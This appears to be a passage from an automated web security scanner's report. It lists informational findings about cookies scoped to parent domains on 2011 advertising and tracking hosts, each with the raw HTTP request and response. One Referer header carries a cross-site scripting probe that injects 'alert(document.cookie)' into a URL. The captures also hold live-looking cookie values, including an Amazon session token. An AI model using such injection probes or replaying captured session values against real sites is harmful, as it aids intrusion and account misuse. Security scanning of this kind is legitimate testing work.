ve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

12.122. http://rs.gwallet.com/r1/pixel/x420r9190030 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x420r9190030

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ra1_uid=4626038992661376064; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=L4-e5U0-I3U0; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x420r9190030 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=y3-e570-I370; ra1_sid=3

Response

HTTP/1.1 200 OK
Content-Length: 262
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=L4-e5U0-I3U0; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Tue, 12-Jun-2012 11:02:19 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ><img src="http://rs.gwallet.com/r1/pixel/x883?r1s=45GKyiWTmmrlAlHxfmMtoD3sIS9W5Y
...[SNIP]...

12.123. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.ugo.com
Path:	/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26FAF9AB85158BD1-60000180C01100BD[CE]; Expires=Sat, 11 Jun 2016 11:24:07 GMT; Domain=.ugo.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583?AQB=1&ndh=1&t=13/5/2011%206%3A18%3A39%201%20300&ns=hearstugo&pageName=ugo%3Atv%3Agame-of-thrones-baelor-preview&g=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&cc=USD&ch=tv&server=www.ugo.com&events=event2%2Cevent4&products=%3Bdummy%20product%3B%3B%3Bevent4%3D3&c1=kevin-fitzpatrick&v1=kevin-fitzpatrick&v2=ugo%3Atv%3Agame-of-thrones-baelor-preview&c3=35%2C31&v3=35%2C31&c4=article&v4=article&c5=1&v5=1&c6=ugo&v6=ugo&c7=filmtv&v7=filmtv&c11=top-86x14%2Ctop-728x90%2Ctop-300x250&v11=top-86x14%2Ctop-728x90%2Ctop-300x250&c12=216946&v12=216946&c17=11582%2C4072%2C3263%2C5834%2C35518&v17=11582%2C4072%2C3263%2C5834%2C35518&c25=7%3A00AM&v25=7%3A00AM&c26=Monday&v26=Monday&c27=Weekday&v27=Weekday&c30=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&v30=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&c49=magnus&c50=magnus&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: s.ugo.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=240756231.1307963898.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=240756231.1048793645.1307963898.1307963898.1307963898.1; __utmc=240756231; __utmb=240756231.1.10.1307963898; _vaTC=uuid=b7ddbc49-933b-4de0-9889-57b575dbf123&cId=SaUUUk&track=true&sendSess=false&seq=1&intEngTimeReport=15000&lastAccess=1307963900099; _vaHC=holdout=false; __qca=P0-220341866-1307963918990; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:24:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26FAF9AB85158BD1-60000180C01100BD[CE]; Expires=Sat, 11 Jun 2016 11:24:07 GMT; Domain=.ugo.com; Path=/
Location: http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583?AQB=1&pccr=true&vidn=26FAF9AB85158BD1-60000180C01100BD&&ndh=1&t=13/5/2011%206%3A18%3A39%201%20300&ns=hearstugo&pageName=ugo%3Atv%3Agame-of-thrones-baelor-preview&g=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&cc=USD&ch=tv&server=www.ugo.com&events=event2%2Cevent4&products=%3Bdummy%20product%3B%3B%3Bevent4%3D3&c1=kevin-fitzpatrick&v1=kevin-fitzpatrick&v2=ugo%3Atv%3Agame-of-thrones-baelor-preview&c3=35%2C31&v3=35%2C31&c4=article&v4=article&c5=1&v5=1&c6=ugo&v6=ugo&c7=filmtv&v7=filmtv&c11=top-86x14%2Ctop-728x90%2Ctop-300x250&v11=top-86x14%2Ctop-728x90%2Ctop-300x250&c12=216946&v12=216946&c17=11582%2C4072%2C3263%2C5834%2C35518&v17=11582%2C4072%2C3263%2C5834%2C35518&c25=7%3A00AM&v25=7%3A00AM&c26=Monday&v26=Monday&c27=Weekday&v27=Weekday&c30=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&v30=http%3A//www.ugo.com/tv/game-of-thrones-baelor-preview&c49=magnus&c50=magnus&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 11:24:07 GMT
Last-Modified: Tue, 14 Jun 2011 11:24:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www406
Content-Length: 0
Content-Type: text/plain

12.124. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A23";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT
audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1510],\"a\":[]},\"8\":{\"f\":1309071600,\"e\":1309071600,\"s\":[545],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=cadreon&type=gif&segment=23&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-05-27+06%3A00%3A51"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"8\":{\"f\":1309071600,\"e\":1309071600,\"s\":[545],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A23";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"9\":{\"f\":1310540400,\"e\":1310540400,\"s\":[1510],\"a\":[]},\"8\":{\"f\":1309071600,\"e\":1309071600,\"s\":[545],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:03 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

12.125. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segs.btrll.com
Path:	/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Mon, 11-Jun-2012 11:32:52 GMT; path=/; domain=.btrll.com
DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5snGQ; expires=Wed, 12-Jun-2013 11:32:52 GMT; path=/; domain=.btrll.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/ifb/audience-science.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4

Response

HTTP/1.1 302 Found
Date: Mon, 13 Jun 2011 11:32:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak3UHRx%2BKy%2FsAb%2Fk4Ck; expires=Mon, 11-Jun-2012 11:32:52 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VGWhBwAY9juTn4YeQBj2HROVkeDAGPYxU5-GHkAY9i_Tn4YeQBj3E5Rrwz4AGPYOk5snGQ; expires=Wed, 12-Jun-2013 11:32:52 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

12.126. http://services.krxd.net/geoip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/geoip

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:49 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /geoip?root_name=KRUX.ST.geo HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.253.191.52.1305981477680138
If-None-Match: "833b91a59b2962c75db21f499c2e9829d1408b57"

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=28800
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:25:49 GMT
Etag: "833b91a59b2962c75db21f499c2e9829d1408b57"
Server: Krux Cache
Set-Cookie: ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:49 GMT
Set-Cookie: AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:49 GMT
Via: 1.1 logger016.krxd.net
X-Age: 400
X-Cache: HIT
X-Cache-Hits: 2
X-GeoIP: 173.193.214.243
X-Request-Backend: geoip
X-Request-Time: D=414 t=1307964349212472
X-Served-By: logger016.krxd.net
X-Served-By: logger016.krxd.net
Content-Length: 75
Connection: keep-alive

KRUX.ST.geo={"country": "US", "region": "TX", "city": "Dallas", "dma": 623}

12.127. http://services.krxd.net/pixel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://services.krxd.net
Path:	/pixel.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:58 GMT
AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:58 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel.gif?_kcp_d=time.com&kplt0=2&_knifr=14&_kpid=a0aa309c-d0ef-4b32-9684-99ab0888e402&_kcp_s=Time.com&_kcp_sc=arts%26entertainment&_kcp_ssc=tuned_in&_kua_content_type=blog HTTP/1.1
Host: services.krxd.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.253.191.52.1305981477680138; ServedBy=logger016; AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: private, no-cache, no-store
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:25:58 GMT
Last-Modified: Fri, 13 May 2011 20:28:07 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
Set-Cookie: ServedBy=logger016; path=/; domain=.krxd.net; expires=Sun, 11-Dec-2011 00:45:58 GMT
Set-Cookie: AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C19ECD62FC500669949F2DABE51E11FC0254B5838D848975E9A1B28EBCD9F7A8E3A2424CB818FF241A96D7C3DF757CA158975E1DD9DA600B0D90415D97CBCB0B5;PATH=/;DOMAIN=.krxd.net;EXPIRES=Sun, 11-Dec-2011 00:45:58 GMT
X-Request-Time: D=113 t=1307964358580167
X-Served-By: logger016.krxd.net
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,........@..D.;

12.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://showadsak.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27438&siteId=27439&adId=22527&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=254264&pageURL=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&frameName=http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439&kltstamp=2011-5-13%206%3A6%3A0&ranreq=0.2702138659078628&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=5x52&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PMAT=3Ti5LKcVEDTzyhgOvr-betCmBK5yt1tldIGA_2X1uOnJM8F3howtaQw; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1648
Date: Mon, 13 Jun 2011 11:19:39 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Tue, 12-Jun-2012 11:19:32 GMT; path=/
Set-Cookie: pubfreq_27439_22527_1971237560=165-1; domain=pubmatic.com; expires=Mon, 13-Jun-2011 11:59:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 14-Jun-2011 11:19:32 GMT; path=/

document.write('<div id="http_thesouthern_comsportsbasketballarticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38_htmlkomli_ads_frame12743827439" style="position: absolute; margin: 0px 0px 0px 0px; height: 0p
...[SNIP]...

12.129. http://sis.amazon.com/iu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sis.amazon.com
Path:	/iu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

apn-user-id=bfda6b1d-debe-4c19-866c-4db6f0ebc0c5; Domain=amazon.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iu?dmnId=imdb.com&dId=&tId=&pId=tt0944947&r=1&rP=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0944947%2F HTTP/1.1
Host: sis.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0944947/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Pk4J1Iz6Jr/V3elId614WRN/JWpmrSz9v3Gv2ANrdL8KtvemjXm4LIpNAFcWwUWX4OXKhZFili3HPMUBh4AIUBZ3MfdONSjlL0cManuKMIEkuxZ7ZOWt1rk2b+H+5oubgG+M6InDXs/yf0u8u9MCBXKDLVbBHt9T4kx+haLZHBYnUi5Kt+8w9uf8QI8zjeFT3D73ORj15LsZbC25bfCYI1hLiaSmfMSNf5gq7nNiu9CB4rnBEgcd/0dHyMnhlGuu; apn-user-id=bfda6b1d-debe-4c19-866c-4db6f0ebc0c5; ubid-main=183-7472389-6212969; session-id-time=2082787201l; session-id=181-1331327-3579512

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:12 GMT
Server: Server
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Type: text/html;charset=ISO-8859-1
nnCoection: close
Set-Cookie: apn-user-id=bfda6b1d-debe-4c19-866c-4db6f0ebc0c5; Domain=amazon.com; Expires=Thu, 01-Jan-2037 00:00:01 GMT; Path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 65

<html><body style="background-color:transparent">
</body></html>

12.130. http://srv.clickfuse.com/pixels/delete.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/pixels/delete.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

criteo=deleted; expires=Sun, 13-Jun-2010 11:21:24 GMT; path=/; domain=.clickfuse.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixels/delete.php?name=criteo HTTP/1.1
Host: srv.clickfuse.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: criteo=tagged

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:21:25 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="/w3c/p3p.xml"
Server: Apache
Set-Cookie: criteo=deleted; expires=Sun, 13-Jun-2010 11:21:24 GMT; path=/; domain=.clickfuse.com
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.6
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D..

12.131. http://stgapi.choicestream.com/instr/csanywhere.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stgapi.choicestream.com
Path:	/instr/csanywhere.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 11:18:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/csanywhere.js HTTP/1.1
Host: stgapi.choicestream.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 916350b8-aedc-414c-9203-46f89408063f
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
ETag: W/"84353-1300364150000"
